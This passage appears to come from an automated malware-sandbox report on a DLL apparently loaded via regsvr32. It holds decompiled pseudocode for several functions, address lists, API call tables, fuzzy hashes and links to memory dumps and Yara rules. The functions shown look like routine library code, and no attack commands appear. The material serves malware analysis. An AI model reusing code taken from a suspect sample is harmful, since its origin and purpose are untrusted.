                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
                                                                                                            • Instruction ID: 4ec50c83481157a01d9dbb3de4afa19c59092b64c33b3db984519a0354e02278
                                                                                                            • Opcode Fuzzy Hash: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
                                                                                                            • Instruction Fuzzy Hash: 18115176604225BFE201DB85DD81E96B7DCEF4A784F024046FF44EB2A1C721BC548EA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100109B6 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E100109B6(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E100209E8(0, 0);
				_t22 = E100010C9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E10004E3A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10020F40(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1001FC9C(_t28);
			}












                                                                                                            0x100109b6
                                                                                                            0x100109b6
                                                                                                            0x100109b6
                                                                                                            0x100109bd
                                                                                                            0x100109c7
                                                                                                            0x100109d3
                                                                                                            0x100109d9
                                                                                                            0x100109de
                                                                                                            0x100109e4
                                                                                                            0x100109e6
                                                                                                            0x100109eb
                                                                                                            0x100109f1
                                                                                                            0x100109f1
                                                                                                            0x100109f9
                                                                                                            0x10010a0a
                                                                                                            0x10010a16
                                                                                                            0x10010a1b
                                                                                                            0x10010a21
                                                                                                            0x10010a24
                                                                                                            0x10010a29
                                                                                                            0x10010a33
                                                                                                            0x10010a33
                                                                                                            0x10010a36
                                                                                                            0x10010a3c
                                                                                                            0x10010a47

                                                                                                            APIs
                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 100109BD
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 100109C7
                                                                                                              • Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28
                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6), ref: 100109DE
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
                                                                                                              • Part of subcall function 10004E3A: __CxxThrowException@8.LIBCMT ref: 10004E4E
                                                                                                            • _memset.LIBCMT ref: 10010A0A
                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 356813703-0
                                                                                                            • Opcode ID: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
                                                                                                            • Instruction ID: 46b5b42a71e0509a224d2307cf2bd15c4222dc2e63f5f7ecafe87185b2be41b2
                                                                                                            • Opcode Fuzzy Hash: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
                                                                                                            • Instruction Fuzzy Hash: CC117C74100605AFE721EF60CC8AC6BBBA5FF08354B50C129F9869A567CB71ED90CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010DB4 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10010DB4(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                                                            0x10010dbe
                                                                                                            0x10010dc4
                                                                                                            0x10010dcb
                                                                                                            0x10010dd2
                                                                                                            0x10010dd9
                                                                                                            0x10010de6
                                                                                                            0x10010ded
                                                                                                            0x10010df0
                                                                                                            0x10010df3
                                                                                                            0x10010df7

                                                                                                            APIs
                                                                                                            • GetSysColor.USER32(0000000F), ref: 10010DC0
                                                                                                            • GetSysColor.USER32(00000010), ref: 10010DC7
                                                                                                            • GetSysColor.USER32(00000014), ref: 10010DCE
                                                                                                            • GetSysColor.USER32(00000012), ref: 10010DD5
                                                                                                            • GetSysColor.USER32(00000006), ref: 10010DDC
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 10010DE9
                                                                                                            • GetSysColorBrush.USER32(00000006), ref: 10010DF0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$Brush
                                                                                                            • String ID:
                                                                                                            • API String ID: 2798902688-0
                                                                                                            • Opcode ID: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
                                                                                                            • Instruction ID: d7120ba38cccac322e287d397fd1090e884fedfb1f22003e23e449693bce91bf
                                                                                                            • Opcode Fuzzy Hash: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
                                                                                                            • Instruction Fuzzy Hash: 4DF0F8719407489BE730BB728D49B47BAE1EFC4B10F02092AD2818BA91E6B6E0409F40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019F87 Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10019F87(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x10045580; // 0x8f64cb61
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1001FBC4(E10034676, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E10004E6E(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E1001BDF4(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E10017AC2( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E10015BAB( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E10017807(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10038c38;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E1001BDD4(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10015A3D(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E1001BDD4(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E10015A9D( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E1001BDD4(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E10017866(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E10017A12(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E1001BDD4(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000563B(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E1001C08A(0, _t346 - 0xbc, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E1001BDD4(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E1001BD1D(_t346 - 0x9c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E1001BDD4(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E1001BF8E(_t346 - 0x8c, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E1001BDD4(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E1001BDD4(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E10005525(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E1001C08A(0, _t346 - 0xcc, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E1001BDD4(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										E10001260(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E1001BD1D(_t346 - 0xac,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E1001BDD4(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E1001BD44(_t346 - 0x7c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E1001BDD4(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E1001BDD4(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E1001BDD4(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E1001BDD4(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E1001BDD4(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1001FBB5( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}










































                                                                                                            0x10019f87
                                                                                                            0x10019f87
                                                                                                            0x10019f87
                                                                                                            0x10019f8b
                                                                                                            0x10019f8f
                                                                                                            0x10019f96
                                                                                                            0x10019f99
                                                                                                            0x10019fa3
                                                                                                            0x10019fad
                                                                                                            0x10019fb2
                                                                                                            0x10019fb4
                                                                                                            0x10019fb7
                                                                                                            0x10019fbd
                                                                                                            0x10019fbf
                                                                                                            0x10019fc1
                                                                                                            0x10019fc1
                                                                                                            0x10019fc1
                                                                                                            0x10019fd0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019fd6
                                                                                                            0x10019fe0
                                                                                                            0x10019fe8
                                                                                                            0x10019feb
                                                                                                            0x10019fee
                                                                                                            0x10019ff6
                                                                                                            0x1001a013
                                                                                                            0x1001a01f
                                                                                                            0x1001a024
                                                                                                            0x1001a026
                                                                                                            0x00000000
                                                                                                            0x1001a028
                                                                                                            0x1001a028
                                                                                                            0x1001a02c
                                                                                                            0x1001a037
                                                                                                            0x1001a039
                                                                                                            0x1001a293
                                                                                                            0x1001a293
                                                                                                            0x1001a298
                                                                                                            0x00000000
                                                                                                            0x1001a29e
                                                                                                            0x1001a29e
                                                                                                            0x1001a29e
                                                                                                            0x1001a29f
                                                                                                            0x1001a3d7
                                                                                                            0x1001a3dc
                                                                                                            0x1001a3de
                                                                                                            0x1001a3e4
                                                                                                            0x1001a3e7
                                                                                                            0x1001a3ea
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ef
                                                                                                            0x1001a3ef
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3f7
                                                                                                            0x1001a3fa
                                                                                                            0x1001a3fc
                                                                                                            0x1001a3fc
                                                                                                            0x1001a3fe
                                                                                                            0x1001a401
                                                                                                            0x1001a40e
                                                                                                            0x1001a412
                                                                                                            0x1001a417
                                                                                                            0x00000000
                                                                                                            0x1001a417
                                                                                                            0x1001a2a5
                                                                                                            0x1001a2a6
                                                                                                            0x1001a2a6
                                                                                                            0x1001a2a7
                                                                                                            0x1001a380
                                                                                                            0x1001a382
                                                                                                            0x1001a38c
                                                                                                            0x1001a392
                                                                                                            0x1001a395
                                                                                                            0x1001a3a2
                                                                                                            0x1001a3a5
                                                                                                            0x1001a3aa
                                                                                                            0x1001a3b3
                                                                                                            0x1001a3bd
                                                                                                            0x1001a3c1
                                                                                                            0x1001a3c6
                                                                                                            0x00000000
                                                                                                            0x1001a3c6
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ae
                                                                                                            0x1001a322
                                                                                                            0x1001a327
                                                                                                            0x1001a329
                                                                                                            0x1001a333
                                                                                                            0x1001a336
                                                                                                            0x1001a346
                                                                                                            0x1001a349
                                                                                                            0x1001a34e
                                                                                                            0x1001a357
                                                                                                            0x1001a361
                                                                                                            0x1001a365
                                                                                                            0x1001a36a
                                                                                                            0x00000000
                                                                                                            0x1001a36a
                                                                                                            0x1001a2b0
                                                                                                            0x1001a2b0
                                                                                                            0x1001a2b1
                                                                                                            0x1001a2c0
                                                                                                            0x1001a2c5
                                                                                                            0x1001a2c7
                                                                                                            0x1001a2f1
                                                                                                            0x1001a2f6
                                                                                                            0x1001a2fe
                                                                                                            0x1001a308
                                                                                                            0x1001a30c
                                                                                                            0x1001a311
                                                                                                            0x00000000
                                                                                                            0x1001a311
                                                                                                            0x1001a2c7
                                                                                                            0x1001a2b1
                                                                                                            0x1001a2ae
                                                                                                            0x1001a2a7
                                                                                                            0x1001a29f
                                                                                                            0x1001a03f
                                                                                                            0x1001a03f
                                                                                                            0x1001a25c
                                                                                                            0x1001a26c
                                                                                                            0x1001a270
                                                                                                            0x1001a279
                                                                                                            0x1001a27d
                                                                                                            0x1001a289
                                                                                                            0x1001a28b
                                                                                                            0x00000000
                                                                                                            0x1001a045
                                                                                                            0x1001a045
                                                                                                            0x1001a048
                                                                                                            0x1001a137
                                                                                                            0x1001a13a
                                                                                                            0x1001a234
                                                                                                            0x1001a23d
                                                                                                            0x1001a241
                                                                                                            0x1001a246
                                                                                                            0x00000000
                                                                                                            0x1001a140
                                                                                                            0x1001a140
                                                                                                            0x1001a143
                                                                                                            0x1001a1fb
                                                                                                            0x1001a204
                                                                                                            0x1001a208
                                                                                                            0x1001a20d
                                                                                                            0x00000000
                                                                                                            0x1001a149
                                                                                                            0x1001a149
                                                                                                            0x1001a14c
                                                                                                            0x1001a152
                                                                                                            0x1001a155
                                                                                                            0x1001a1c5
                                                                                                            0x1001a1cc
                                                                                                            0x1001a1d2
                                                                                                            0x1001a1dc
                                                                                                            0x1001a1e0
                                                                                                            0x1001a1e5
                                                                                                            0x00000000
                                                                                                            0x1001a157
                                                                                                            0x1001a157
                                                                                                            0x1001a15a
                                                                                                            0x00000000
                                                                                                            0x1001a15c
                                                                                                            0x1001a15c
                                                                                                            0x1001a15f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a15f
                                                                                                            0x1001a15a
                                                                                                            0x1001a155
                                                                                                            0x1001a14c
                                                                                                            0x1001a143
                                                                                                            0x1001a04e
                                                                                                            0x1001a04e
                                                                                                            0x1001a41f
                                                                                                            0x1001a42d
                                                                                                            0x1001a43d
                                                                                                            0x1001a441
                                                                                                            0x1001a44a
                                                                                                            0x1001a44e
                                                                                                            0x1001a45a
                                                                                                            0x1001a45c
                                                                                                            0x1001a45f
                                                                                                            0x1001a45f
                                                                                                            0x1001a462
                                                                                                            0x1001a465
                                                                                                            0x1001a054
                                                                                                            0x1001a055
                                                                                                            0x1001a055
                                                                                                            0x1001a056
                                                                                                            0x1001a190
                                                                                                            0x1001a1a6
                                                                                                            0x1001a1af
                                                                                                            0x1001a1b3
                                                                                                            0x1001a1b8
                                                                                                            0x00000000
                                                                                                            0x1001a05c
                                                                                                            0x1001a05c
                                                                                                            0x1001a05c
                                                                                                            0x1001a05d
                                                                                                            0x1001a165
                                                                                                            0x1001a176
                                                                                                            0x1001a17f
                                                                                                            0x1001a183
                                                                                                            0x1001a188
                                                                                                            0x00000000
                                                                                                            0x1001a063
                                                                                                            0x1001a063
                                                                                                            0x1001a063
                                                                                                            0x1001a064
                                                                                                            0x1001a110
                                                                                                            0x1001a113
                                                                                                            0x1001a11c
                                                                                                            0x1001a126
                                                                                                            0x1001a12a
                                                                                                            0x1001a12f
                                                                                                            0x00000000
                                                                                                            0x1001a06a
                                                                                                            0x1001a06a
                                                                                                            0x1001a06a
                                                                                                            0x1001a06b
                                                                                                            0x1001a0e3
                                                                                                            0x1001a0e6
                                                                                                            0x1001a0f3
                                                                                                            0x1001a0f7
                                                                                                            0x1001a0fc
                                                                                                            0x00000000
                                                                                                            0x1001a06d
                                                                                                            0x1001a06d
                                                                                                            0x1001a06d
                                                                                                            0x1001a06e
                                                                                                            0x1001a0a9
                                                                                                            0x1001a0b3
                                                                                                            0x1001a0b9
                                                                                                            0x1001a0bc
                                                                                                            0x1001a0c6
